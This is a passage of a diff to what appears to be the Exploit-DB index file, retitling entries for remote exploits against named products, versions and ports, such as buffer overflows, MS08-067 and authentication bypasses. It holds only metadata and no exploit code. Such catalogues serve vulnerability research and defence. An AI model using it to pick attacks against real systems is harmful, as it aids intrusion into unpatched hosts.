580,platforms/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Code Execution",2004-10-17,rtk,linux,remote,2812 -581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 +581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration",2004-10-17,"Leon Juranic",linux,remote,0 582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25 583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 584,platforms/win_x86/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,win_x86,remote,0 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP 'STOR' Buffer Overflow",2004-10-21,muts,windows,remote,21 -589,platforms/windows/remote/589.html,"Multiple Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0 +589,platforms/windows/remote/589.html,"Multiple Browsers - Tabbed Browsing",2004-10-22,"Jakob Balle",windows,remote,0 590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000 592,platforms/windows/remote/592.py,"Ability Server 2.34 - 'APPE' Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21 598,platforms/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Buffer Overflow",2004-10-26,muts,windows,remote,25 @@ -9528,7 +9530,7 @@ id,file,description,date,author,platform,type,port 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Executions (PoC)",2004-10-28,infamous41md,linux,remote,0 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow",2004-11-02,Skylined,windows,remote,0 616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,windows,remote,80 -618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 +618,platforms/windows/remote/618.c,"Ability Server 2.34 (Unix) - FTP 'STOR' Buffer Overflow",2004-11-07,NoPh0BiA,windows,remote,21 619,platforms/windows/remote/619.c,"CCProxy Log - Remote Stack Overflow",2004-11-09,Ruder,windows,remote,808 620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Format String",2004-11-09,"Carlos Barros",linux,remote,25 621,platforms/windows/remote/621.c,"CCProxy 6.2 - 'ping' Remote Buffer Overflow",2004-11-10,KaGra,windows,remote,23 @@ -9562,7 +9564,7 @@ id,file,description,date,author,platform,type,port 730,platforms/windows/remote/730.html,"Microsoft Internet Explorer - Remote Code Execution (PoC)",2004-12-28,ShredderSub7,windows,remote,0 733,platforms/windows/remote/733.c,"Microsoft Windows Server 2000 - WINS Remote Code Execution",2004-12-31,zuc,windows,remote,42 734,platforms/windows/remote/734.c,"Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 -745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000 +745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (CGI)",2005-01-08,ZzagorR,multiple,remote,10000 746,platforms/multiple/remote/746.pl,"Webmin 1.5 - Brute Force / Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,windows,remote,6101 753,platforms/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)",2005-01-12,Skylined,windows,remote,0 @@ -9671,8 +9673,8 @@ id,file,description,date,author,platform,type,port 1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - Expires Header Remote Buffer Overflow",2005-08-22,c0ntex,linux,remote,0 1178,platforms/windows/remote/1178.c,"Microsoft IIS 5.0 - '500-100.asp' Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish) (MS05-039)",2005-08-25,RoMaNSoFt,windows,remote,445 -1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039)",2005-08-25,"Fabrice Mourron",windows,remote,445 -1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote,0 +1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service (French) - Remote Universal Exploit (MS05-039)",2005-08-25,"Fabrice Mourron",windows,remote,445 +1183,platforms/windows/remote/1183.c,"Battlefield (BFCC < 1.22_A /BFVCC < 2.14_B / BF2CC) - Authentication Bypass / Password Stealer / Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow (2)",2005-08-30,basher13,windows,remote,80 1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Exploit",2005-08-30,Lympex,multiple,remote,0 1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Exploit",2005-08-31,jpno5,windows,remote,6129 @@ -9700,7 +9702,7 @@ id,file,description,date,author,platform,type,port 1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode Exploit",2005-10-29,ATmaCA,windows,remote,0 1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 -1288,platforms/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind)",2005-11-02,xwings,linux,remote,0 +1288,platforms/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow",2005-11-02,xwings,linux,remote,0 1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - 'friendsd2' Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0 1291,platforms/lin_x86/remote/1291.pl,"gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String",2005-11-04,"Kevin Finisterre",lin_x86,remote,0 1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 @@ -9717,7 +9719,7 @@ id,file,description,date,author,platform,type,port 1366,platforms/windows/remote/1366.pm,"Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)",2005-12-09,"H D Moore",windows,remote,0 1369,platforms/multiple/remote/1369.html,"Mozilla Firefox 1.04 - 'compareTo()' Remote Code Execution",2005-12-12,"Aviv Raff",multiple,remote,0 1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution (PoC)",2005-12-15,"Mariano Nuñez",windows,remote,0 -1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105 +1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - PH SERVER Remote Exploit",2005-12-16,kingcope,windows,remote,105 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - 'EXAMINE' Buffer Overflow",2005-12-19,muts,windows,remote,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - 'IMAPd' Remote Overflow",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - 'APPE' Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21 @@ -9730,7 +9732,7 @@ id,file,description,date,author,platform,type,port 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",windows,remote,13701 1448,platforms/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC)",2006-01-25,"Critical Security",windows,remote,0 1452,platforms/windows/remote/1452.pm,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,windows,remote,21 -1456,platforms/linux/remote/1456.c,"SHOUTcast 1.9.4 - File Request Format String (Leaked)",2006-01-28,crash-x,linux,remote,8000 +1456,platforms/linux/remote/1456.c,"SHOUTcast 1.9.4 - File Request 'Leaked' Format String",2006-01-28,crash-x,linux,remote,8000 1458,platforms/windows/remote/1458.cpp,"Winamp 5.12 - '.pls' Remote Buffer Overflow (1)",2006-01-29,ATmaCA,windows,remote,0 1460,platforms/windows/remote/1460.pm,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)",2006-01-31,"H D Moore",windows,remote,0 1462,platforms/windows/remote/1462.cpp,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,windows,remote,21 @@ -9802,7 +9804,7 @@ id,file,description,date,author,platform,type,port 2082,platforms/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)",2006-07-28,"H D Moore",multiple,remote,0 2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)",2006-08-07,ri0t,windows,remote,10616 -2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 +2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-08,PATz,hardware,remote,0 2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",windows,remote,445 2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0 2185,platforms/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)",2006-08-14,K-sPecial,linux,remote,110 @@ -9899,7 +9901,7 @@ id,file,description,date,author,platform,type,port 3264,platforms/windows/remote/3264.pl,"Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow",2007-02-04,"Jacopo Cervini",windows,remote,25 3265,platforms/windows/remote/3265.pm,"Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow (Metasploit)",2007-02-04,"Jacopo Cervini",windows,remote,25 3269,platforms/multiple/remote/3269.pl,"Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection",2007-02-05,bunker,multiple,remote,0 -3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 (Windows) - User-Defined Function (UDF) Command Execution",2007-02-06,"Marco Ivaldi",windows,remote,3306 +3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution",2007-02-06,"Marco Ivaldi",windows,remote,3306 3279,platforms/windows/remote/3279.html,"Alibaba Alipay - Remove ActiveX Remote Code Execution",2007-02-06,cocoruder,windows,remote,0 3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure",2007-02-08,Nicob,windows,remote,0 3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass",2007-02-11,kingcope,solaris,remote,23 @@ -9977,11 +9979,11 @@ id,file,description,date,author,platform,type,port 3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - 'mssql_connect()' Remote Buffer Overflow",2007-04-15,rgod,windows,remote,80 3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow",2007-04-15,devcode,windows,remote,139 3746,platforms/windows/remote/3746.txt,"Microsoft Windows - DNS RPC Remote Buffer Overflow (2)",2007-04-18,"Andres Tarasco",windows,remote,445 -3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 +3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - exec-shield Remote Format String",2007-04-24,Xpl017Elz,linux,remote,143 3804,platforms/windows/remote/3804.txt,"Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0 3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)",2007-04-27,shinnai,windows,remote,0 3810,platforms/windows/remote/3810.html,"IPIX Image Well - ActiveX 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0 -3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 +3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow",2007-04-29,Xpl017Elz,linux,remote,0 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0 3822,platforms/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow",2007-04-30,vade79,win_x86,remote,0 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - exec-shield 'proxy.c logurl()' Remote Overflow",2007-05-02,Xpl017Elz,linux,remote,0 @@ -10021,9 +10023,9 @@ id,file,description,date,author,platform,type,port 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow",2007-06-01,shinnai,windows,remote,0 4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow",2007-06-02,rgod,windows,remote,0 4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote Exploit",2007-06-03,muts,windows,remote,8080 -4032,platforms/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration Exploit",2007-06-04,bunker,tru64,remote,0 +4032,platforms/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,tru64,remote,0 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow",2007-06-07,Excepti0n,windows,remote,0 -4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow 2",2007-06-07,Excepti0n,windows,remote,0 +4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)",2007-06-07,Excepti0n,windows,remote,0 4045,platforms/windows/remote/4045.py,"Microsoft Windows - Animated Cursor Stack Overflow",2007-06-07,"RISE Security",windows,remote,0 4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker - ActiveX Multiple Insecure Methods",2007-06-08,shinnai,windows,remote,0 4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker - 'ActiveX NavigateUrl()' Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0 @@ -10049,11 +10051,11 @@ id,file,description,date,author,platform,type,port 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0 4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote Exploit",2007-07-08,Xpl017Elz,linux,remote,80 -4170,platforms/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0 +4170,platforms/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript HeapSpray",2007-07-10,callAX,windows,remote,0 4176,platforms/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0 -4177,platforms/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0 +4177,platforms/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog HeapSpray",2007-07-12,callAX,windows,remote,0 4188,platforms/windows/remote/4188.txt,"Flash Player/Plugin Video - File Parsing Remote Code Execution (PoC)",2007-07-16,yunshu,windows,remote,0 -4190,platforms/windows/remote/4190.html,"Data Dynamics ActiveBar - ActiveX (actbar3.ocx 3.1) Insecure Methods",2007-07-17,shinnai,windows,remote,0 +4190,platforms/windows/remote/4190.html,"Data Dynamics ActiveBar - ActiveX 'actbar3.ocx 3.1' Insecure Methods",2007-07-17,shinnai,windows,remote,0 4200,platforms/windows/remote/4200.html,"Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow",2007-07-19,shinnai,windows,remote,0 4207,platforms/windows/remote/4207.py,"Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow",2007-07-20,"dmc & prdelka",windows,remote,143 4208,platforms/windows/remote/4208.html,"Data Dynamics ActiveReport - ActiveX 'actrpt2.dll 2.5' Insecure Method",2007-07-21,shinnai,windows,remote,0 @@ -10076,14 +10078,14 @@ id,file,description,date,author,platform,type,port 4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - 'VDT70.dll NotSafe' Stack Overflow",2007-08-06,DeltahackingTEAM,windows,remote,0 4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0 4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 -4280,platforms/windows/remote/4280.pl,"Savant Web Server 3.1 - GET Remote Overflow (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 +4280,platforms/windows/remote/4280.pl,"Savant Web Server 3.1 - GET Universal Remote Overflow",2007-08-12,"Jacopo Cervini",windows,remote,80 4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow",2007-08-13,n00b,windows,remote,26000 4287,platforms/windows/remote/4287.py,"Surgemail 38k - 'Search' Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - 'uacomx.ocx 2.0.1' Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0 4301,platforms/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 -4312,platforms/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 +4312,platforms/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0 @@ -10134,7 +10136,7 @@ id,file,description,date,author,platform,type,port 4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow",2005-05-03,greuff,linux,remote,0 4541,platforms/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow",2005-10-16,greuff,linux,remote,27015 4542,platforms/linux/remote/4542.py,"Boa 0.93.15 - HTTP Basic Authentication Bypass",2007-10-16,ikki,linux,remote,0 -4552,platforms/linux/remote/4552.pl,"Apache Tomcat - WebDAV Remote File Disclosure (SSL)",2007-10-21,h3rcul3s,linux,remote,0 +4552,platforms/linux/remote/4552.pl,"Apache Tomcat - WebDAV SSL Remote File Disclosure",2007-10-21,h3rcul3s,linux,remote,0 4556,platforms/multiple/remote/4556.txt,"Litespeed Web Server 3.2.3 - Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote,0 4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT - Remote Overflow (Metasploit)",2007-10-24,ri0t,windows,remote,10616 4567,platforms/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure",2007-10-24,kingcope,multiple,remote,0 @@ -10239,7 +10241,7 @@ id,file,description,date,author,platform,type,port 5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution",2008-03-20,kingcope,solaris,remote,0 5283,platforms/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0 5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution",2008-03-21,"Pranav Joshi",hardware,remote,0 -5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0 +5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)",2008-03-26,meathive,hardware,remote,0 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69 5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)",2008-03-26,muts,windows,remote,69 5330,platforms/win_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,win_x86,remote,80 @@ -10259,7 +10261,7 @@ id,file,description,date,author,platform,type,port 5489,platforms/windows/remote/5489.html,"Zune Software - ActiveX Arbitrary File Overwrite",2008-04-23,"ilion security",windows,remote,0 5496,platforms/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods",2008-04-25,callAX,windows,remote,0 5511,platforms/windows/remote/5511.html,"HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method (PoC)",2008-04-27,callAX,windows,remote,0 -5519,platforms/windows/remote/5519.c,"VideoLAN VLC Media Player 0.8.6d - httpd_FileCallBack Remote Format String",2008-04-28,EpiBite,windows,remote,0 +5519,platforms/windows/remote/5519.c,"VideoLAN VLC Media Player 0.8.6d - 'httpd_FileCallBack' Remote Format String",2008-04-28,EpiBite,windows,remote,0 5530,platforms/windows/remote/5530.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Remote Buffer Overflow",2008-05-02,lhoang8500,windows,remote,0 5534,platforms/multiple/remote/5534.txt,"HLDS WebMod 0.48 - Multiple Remote Vulnerabilities",2008-05-03,"Luigi Auriemma",multiple,remote,0 5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 - 'rconpass' Remote Heap Overflow",2008-05-03,SkOd,windows,remote,0 @@ -10285,7 +10287,7 @@ id,file,description,date,author,platform,type,port 5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - 'TextOut.dll' ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote,0 5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)",2008-06-13,securfrog,windows,remote,0 5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000 -5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0 +5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)",2008-06-24,meathive,hardware,remote,0 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0 6012,platforms/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 @@ -10306,7 +10308,7 @@ id,file,description,date,author,platform,type,port 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote,0 6175,platforms/windows/remote/6175.html,"NCTsoft - 'AudFile.dll' ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,windows,remote,0 6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - 'imgsrc' Remote Buffer Overflow",2008-08-03,r0ut3r,windows,remote,0 -6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote,0 +6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote,0 6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",windows,remote,0 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)",2008-08-11,"Simon Ryeo",multiple,remote,0 @@ -10358,7 +10360,7 @@ id,file,description,date,author,platform,type,port 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX - 'VImpX.ocx' Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 6840,platforms/windows/remote/6840.html,"PowerTCP FTP Module - Multiple Exploit Techniques (SEH HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 -6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution (MS08-067) (Universal)",2008-10-26,EMM,windows,remote,135 +6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Universal Code Execution (MS08-067)",2008-10-26,EMM,windows,remote,135 6870,platforms/windows/remote/6870.html,"MW6 Aztec - ActiveX 'Aztec.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6871,platforms/windows/remote/6871.html,"MW6 Barcode - ActiveX 'Barcode.dll' Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6872,platforms/windows/remote/6872.html,"MW6 Datamatrix - ActiveX 'Datamatrix.dll' Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 @@ -10369,7 +10371,7 @@ id,file,description,date,author,platform,type,port 6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 / WL54AP2 - Cross-Site Request Forgery / Cross-Site Scripting",2008-10-31,"Henri Lindberg",hardware,remote,0 6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API Exploit (Metasploit)",2008-11-01,"Kevin Finisterre",windows,remote,0 6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC)",2008-11-03,shinnai,windows,remote,0 -7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Config Download",2008-11-07,hkm,hardware,remote,0 +7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Configuration Download",2008-11-07,hkm,hardware,remote,0 7056,platforms/windows/remote/7056.rb,"GE Proficy Real Time Information Portal - Credentials Leak Sniffer (Metasploit)",2008-11-08,"Kevin Finisterre",windows,remote,0 7104,platforms/windows/remote/7104.c,"Microsoft Windows Server - Code Execution (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 7125,platforms/windows/remote/7125.txt,"Microsoft Windows - SmbRelay3 NTLM Replay Exploit (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote,0 @@ -10443,7 +10445,7 @@ id,file,description,date,author,platform,type,port 8023,platforms/hardware/remote/8023.txt,"ZeroShell 1.0beta11 - Remote Code 